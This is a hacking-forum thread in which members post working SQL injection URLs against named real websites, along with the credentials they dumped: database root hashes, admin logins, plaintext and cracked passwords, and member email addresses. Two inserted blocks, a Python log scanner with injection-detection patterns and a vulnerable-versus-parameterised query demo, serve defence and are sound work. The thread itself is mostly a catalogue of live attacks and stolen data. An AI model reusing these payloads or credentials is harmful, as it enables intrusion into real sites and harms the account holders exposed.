SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Ded MustD!e

    http://www.floraindia.com
    Code:
    http://www.floraindia.com/details.cfm?PID=1+or+1=(SELECT+TOP+1+cast(email+as+nvarchar)%2Bchar(58)%2Bcast(Password+as+nvarchar)+FROM+membermaster)--
    Code:
    http://www.floraindia.com/details.cfm?PID=1+or+1=(SELECT+TOP+1+cast(username+as+nvarchar)%2Bchar(58)%2Bcast(pwd+as+nvarchar)+FROM+users)--
    http://www.highwayafrica.ru.ac.za PR:5
    Code:
    http://www.highwayafrica.ru.ac.za/page.cfm?pID=-1+union+select+1,2,unhex(hex(concat(user,0x3a,password))),4,5+from+mysql.user/*
    root:*78961DCFDA81834DF8D39AB3BDFD900D16809523
    Code:
    http://www.highwayafrica.ru.ac.za/page.cfm?pID=-1+union+select+1,2,unhex(hex(concat(username,0x3a,userpassword))),4,5+from+admin/*
    admin:highwayafrica

    Admin panel:
     
    2 people like this.
  2. OptimaPrime

    neeblee.com
    Code:
    http://www.neeblee.com/plaincart/index.php?c=39&p=-33+union+select+1,concat_ws(0x3,user_name,user_password),3,4,5+from+tbl_user/*
     
    #5462 OptimaPrime, 22 May 2008
    Last edited: 22 May 2008
    2 people like this.
  3. OptimaPrime

    arcdi.com
    Code:
    http://www.arcdi.com/trainers.php?id=-33+union+select+1,concat(username,0x3a,password),3,4,5+FROM+users%20--
     
    3 people like this.
  4. desTiny

    came across the site by accident and noticed this; maybe someone will come up with something for it...
    blind sql inject:
    http://www.microstar.ru/program/products/notebook/nb/pro_nb_selling.php?UID=630%20and%201=1
     
    1 person likes this.
  5. †c0(aIn?†

    Code:
    http://www.globaleconomicgovernance.org/research.php?id=-1+union+select+1, concat(version(),0x3a,database(),0x3a,user()),3,4,5,6,7/*
    version: 5.0.45 log
    db name: db158065722
    user: [email protected]
     
    1 person likes this.
  6. Ded MustD!e

    http://www.landbigfish.com

    Code:
    http://www.landbigfish.com/tacklestore/showcase.cfm?PID=1+or+1=(SELECT+TOP+1+cast(username+as+nvarchar)%2Bchar(58)%2Bcast(password+as+nvarchar)+FROM+AdminUsers)--
     
    3 people like this.
  7. OptimaPrime

    yamaha-service.de
    Code:
    http://www.yamaha-service.de/cat1.php?archivset=1&newsset=&idcat1=-1+union+select+all+1,username,3,password,5+from+users--
     
    2 people like this.
  8. OptimaPrime

    www.relevantmagazine.com
    Code:
    http://www.relevantmagazine.com/pc_article.php?id=-1+union+all+select+1,2,3,4,5,concat(user,char(58),pass),7,8,9,10,11,12,null,14,15,16,17,18,19,20+from+admin/*
     
  9. Momiji

    rib-racers.com
    Code:
    http://www.rib-racers.com/index.php?id=-2+union+select+1,concat_ws(0x3,version(),user(),database()),3,4,5,6,7,8,9,10/*
    5.0.45-log[email protected]ribs
    Code:
    http://www.rib-racers.com/index.php?id=-2+union+select+1,concat_ws(0x3,fname,sname,username,password),3,4,5,6,7,8,9,10+from+reg/*
    PeterJohnsonbloggs3823a5ee1f831626:peter
     
    4 people like this.
  10. Dr.Z3r0

    Here are three hosts on one server

    binar-design.biz
    Code:
    http://binar-design.biz/web/index.php?idk=5-1 AND 1=0 UNION SELECT 1,2,COUNT(CONCAT_WS(0x203a20,TABLE_SCHEMA,TABLE_NAME)),4,5,6 FROM INFORMATION_SCHEMA.TABLES-- f
    no useful tables in the DB :(

    mobilka.com.ua
    Code:
    http://mobilka.com.ua/games/download.php?id=393-1 AND 1=0 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13-- d
    there is a useful table user with columns id,login,pass, but it looks empty =\

    samba.org.ua
    Code:
    http://samba.org.ua/articles/?section=2-1 AND 1=0 UNION SELECT 1,2,COUNT(CONCAT_WS(0x203A20,TABLE_SCHEMA,TABLE_NAME)),4 FROM INFORMATION_SCHEMA.TABLES-- f
    this one is more interesting, three tables with users:
    1) user: empty
    2) sis_users, from here:
    Code:
    Guest : Guest : 
    Petro : 6216f8a75fd5bb3d5f22b6f9958cdede3fc086c2 (111)
    Vlas : 011c945f30ce2cbafc452f39840f025693339c42 (1111)
    3) users, from this table:
    Code:
    Vlas : 2a062126ee92cb96a03bef1eb1008c4d (armagedon)
    tema_c : 698d51a19d8a121ce581499d7b701668 (111)
    Uncnovn : 3f230640b78d7e71ac5514e57935eb69 (qazxsw)
     
    3 people like this.
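The requests in the posts above (UNION SELECT dumps, INFORMATION_SCHEMA and mysql.user probes, MSSQL "SELECT TOP 1 cast(...)" subselects, boolean "and 1=1" tests) are easy to spot in web server access logs once the query string is decoded. The following Python script is an added example, not code from this thread: it decodes each request's parameters and matches them against a small rule set. The log lines, client addresses, paths and parameter names are constructed for the example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines (hypothetical clients and paths) shaped like
# the payloads quoted in this thread: a MySQL UNION/concat dump, an MSSQL
# "1 or 1=(SELECT TOP 1 cast(...))--" error-based probe and a boolean blind test.
# The last two lines are benign traffic that must not be flagged.
SAMPLE_LOG = """\
10.0.0.7 - - [22/May/2008:10:01:09 +0000] "GET /index.php?id=-1+union+select+1,concat(user,0x3a,password),3+from+mysql.user/* HTTP/1.1" 200 734
10.0.0.7 - - [22/May/2008:10:01:15 +0000] "GET /details.cfm?PID=1+or+1=(SELECT+TOP+1+cast(email+as+nvarchar)%2Bchar(58)%2Bcast(Password+as+nvarchar)+FROM+membermaster)-- HTTP/1.1" 500 210
10.0.0.9 - - [22/May/2008:10:02:01 +0000] "GET /page.php?UID=630%20and%201=1 HTTP/1.1" 200 512
10.0.0.5 - - [22/May/2008:10:01:02 +0000] "GET /index.php?id=5 HTTP/1.1" 200 512
10.0.0.5 - - [22/May/2008:10:03:00 +0000] "GET /search.php?q=union+station HTTP/1.1" 200 980
"""

# Pull the request target out of a common-log-format line.
REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<url>\S+) HTTP/')

# Rules run over the decoded, lower-cased, whitespace-collapsed parameter value,
# so "+", "%20" and "%0a" encodings of the separators all look the same.
RULES = [
    ("union_select", re.compile(r"\bunion\b(?:\s+all)?\s+select\b")),
    ("schema_probe", re.compile(r"\b(?:information_schema|mysql\.user)\b")),
    ("mssql_cast_subselect", re.compile(r"\bselect\s+top\s+\d+\s+cast\s*\(")),
    ("concat_dump", re.compile(r"\bconcat(?:_ws)?\s*\(")),
    ("comment_tail", re.compile(r"(?:--|/\*)\s*$")),
    ("boolean_probe", re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+\s*$")),
]


def normalise(value: str) -> str:
    """Lower-case and collapse whitespace so encoding tricks do not split keywords."""
    return re.sub(r"\s+", " ", value).strip().lower()


def classify_params(url: str) -> dict:
    """Return {param: [matched rule names]} for every query parameter of one URL."""
    hits = {}
    # parse_qsl splits each pair on its first "=" only and percent-decodes values,
    # so "PID=1+or+1=(SELECT ...)" keeps the whole payload as the value of PID.
    for name, raw in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        value = normalise(raw)
        matched = [rule for rule, rx in RULES if rx.search(value)]
        if matched:
            hits[name] = matched
    return hits


def scan_log(text: str) -> list:
    """Return (client_ip, url, {param: rules}) for each request tripping a rule."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        hits = classify_params(m.group("url"))
        if hits:
            findings.append((line.split()[0], m.group("url"), hits))
    return findings


if __name__ == "__main__":
    for ip, url, hits in scan_log(SAMPLE_LOG):
        print(ip, url, hits)
```

A single boolean_probe hit on its own is weak evidence (ordinary values can end in "1=1"), so in practice it is worth counting hits per client and alerting on a run of probes against the same parameter, which is exactly the pattern the dumps in this thread leave behind.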
  11. Ded MustD!e

    http://www.ub.bw
    Code:
    http://www.ub.bw/news.cfm?pid=221&t=-1+union+select+1,2,concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15+from+mysql.user/*
    root:*523D4E56011212768221213AC39698CEC334CD28
    ubcms:3f29838236c2615f
    webadmin:*B3AD4B00674739CBE6300BA8A38EBB04C6A1526A
    webadmin:5c42f6195bd93698
    mysql:*E74858DB86EBA20BC33D0AECAE8A8108C56B17FA
     
  12. Momiji

    chtoikak.com
    Code:
    http://chtoikak.com/index.php?id=882+union+select+1,concat_ws(0x3,version(),user(),database()),3,4,5,6,7,8/*
    4.1.22-standardoptimasi_bw@localhostoptimasi_BeautyWorld
    Code:
    http://chtoikak.com/index.php?id=882+union+select+1,concat(user,0x3,pass),3,4,5,6,7,8+from+users+limit+1,1/*
    adminadmin ^^
    Code:
    http://chtoikak.com/index.php?id=882+union+select+1,concat_ws(0x3,login,passw,email),3,4,5,6,7,8+from+reg+limit+1,1/*
    vlapron260561954[email protected]
     
  13. Ded MustD!e

    http://www.mnsafetycouncil.org PR:5
    Code:
    http://www.mnsafetycouncil.org/products/product.cfm?PID=1+or+1=(SELECT+TOP+1+cast(LoginName+as+nvarchar)%2Bchar(58)%2Bcast(Password+as+nvarchar)+from+users)--
     
    3 people like this.
  14. Assembler

    Http://npo.karelia.ru/ however much I dug around, I got nothing except
    Результаты поиска
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''''' at line 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' or e_text_full like '%'''%'' at line 1

    Вы искали - '''

    Совпадений не найдено, попробуйте изменить искомое слово.
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' or e_text_full like '%'''%' ORDER BY e_id DESC limit 0,15' at line 1
    Maybe someone more knowledgeable can help!
    I'm just learning.. I don't understand much yet. Could you suggest a site I can practise on..
     
  15. Ded MustD!e

    http://www.thefrantics.com/
    Code:
    http://www.thefrantics.com/index.cfm?PID=1+or+1=(SELECT+TOP+1+cast(Username+as+nvarchar)%2Bchar(58)%2Bcast(Password+as+nvarchar)+from+Users)--
     
  16. mefish

    to Assembler:

    http://npo.karelia.ru/admin

    PS: and it doesn't work for some reason, maybe someone can explain why :rolleyes:
     
    1 person likes this.
  17. Dimi4

    There's basic authorization there. Most likely it isn't connected to the database.
     
  18. А®ТеS

    2Assembler, I don't know about the search (was too lazy to check), but the site had a straightforward injection in the id parameter of index.php. Here it is, by the way:
    Code:
    http://npo.karelia.ru/?view=event&id=-1+UNION+SELECT+VERSION(),2,3/*
    DB version 5, so tables and columns can be extracted freely.
    Moving on: the most interesting table, in my opinion, is "org.vs_users" with the fields "u_id", "u_name", "u_pass", "u_level". We run the query:
    Code:
    http://npo.karelia.ru/?view=event&id=-1+UNION+SELECT+concat_ws(0x3a,u_id,u_name,u_pass,u_level),2,3+FROM+org.vs_users/*
    We see the administrator account, with the password stored unencrypted:
    Code:
    1:admin:nko:1
    That's all... It even turned into a mini-FAQ :).

    P.S. It is better to serve the law than to break it, hacking is evil! Remember Article 272 of the Criminal Code of the Russian Federation and your moral principles!
     
    1 person likes this.
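The index.php?id injection walked through in the post above works because the id value is pasted into the SQL text, so "-1 UNION SELECT ..." becomes part of the query and the second SELECT reads from a table the page never meant to expose. The following Python/sqlite3 snippet is an added example, not the site's code: it shows the concatenating query beside the parameterised one on a constructed in-memory schema. The table and column names vs_users, u_name and u_pass are borrowed from the post; the events table, the rows and the payload string are invented for the example.

```python
import sqlite3

# Constructed payload in the shape of the post's UNION query: three columns to
# match the page's own SELECT, and a trailing comment to swallow the rest of the SQL.
PAYLOAD = "-1 UNION SELECT u_name || ':' || u_pass, 2, 3 FROM vs_users--"


def build_db() -> sqlite3.Connection:
    """Constructed in-memory schema: an 'events' page table plus a vs_users table."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE events (id INTEGER PRIMARY KEY, title TEXT, place TEXT);
        CREATE TABLE vs_users (u_id INTEGER, u_name TEXT, u_pass TEXT, u_level INTEGER);
        INSERT INTO events VALUES (1, 'Open day', 'Hall A'), (2, 'Seminar', 'Room 3');
        INSERT INTO vs_users VALUES (1, 'admin', 'secret', 1);
    """)
    return con


def event_vulnerable(con: sqlite3.Connection, event_id: str) -> list:
    """String concatenation: whatever arrives in ?id= is parsed as SQL."""
    sql = "SELECT title, place, id FROM events WHERE id=" + event_id
    return con.execute(sql).fetchall()


def event_safe(con: sqlite3.Connection, event_id: str) -> list:
    """Type check plus a bound parameter: the value is data, never SQL text."""
    try:
        n = int(event_id)
    except ValueError:
        return []  # reject anything that is not an integer id
    return con.execute("SELECT title, place, id FROM events WHERE id=?", (n,)).fetchall()


if __name__ == "__main__":
    db = build_db()
    print("vulnerable, normal id:", event_vulnerable(db, "2"))
    print("vulnerable, payload:  ", event_vulnerable(db, PAYLOAD))
    print("safe, normal id:      ", event_safe(db, "2"))
    print("safe, payload:        ", event_safe(db, PAYLOAD))
```

The bound parameter is the fix; the int() check is defence in depth that also gives the application a clean place to log rejected values, which is where the probes seen in this thread first become visible.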
  19. Ded MustD!e

    http://www.goalqpc.com/ PR:5
    Code:
    http://www.goalqpc.com/shop_products_detail.cfm?PID=-1+union+select+version(),2,concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14+from+mysql.user/*
    root:*4148C7277489C55E5A3F49CD1D020FCBE8778C3A
    Code:
    http://www.goalqpc.com/shop_products_detail.cfm?PID=-1+union+select+concat_ws(0x3a,UserEmail,UserPassword),2,3,4,5,6,7,8,9,10,11,12,13,14+from+admin+limit+0,1/*
    [email protected]:deming123
    [email protected]:swissthins


    Admin panel:
    Users:
    Code:
    http://www.goalqpc.com/shop_products_detail.cfm?PID=-1+union+select+concat(useremail,0x3a,userpassword),2,3,4,5,6,7,8,9,10,11,12,13,14+from+user+limit+8000,1/*
    ~8000 members, passwords stored in plaintext.
     
    1 person likes this.
  20. Spyder

    Dom 3

    hmm
     
    1 person likes this.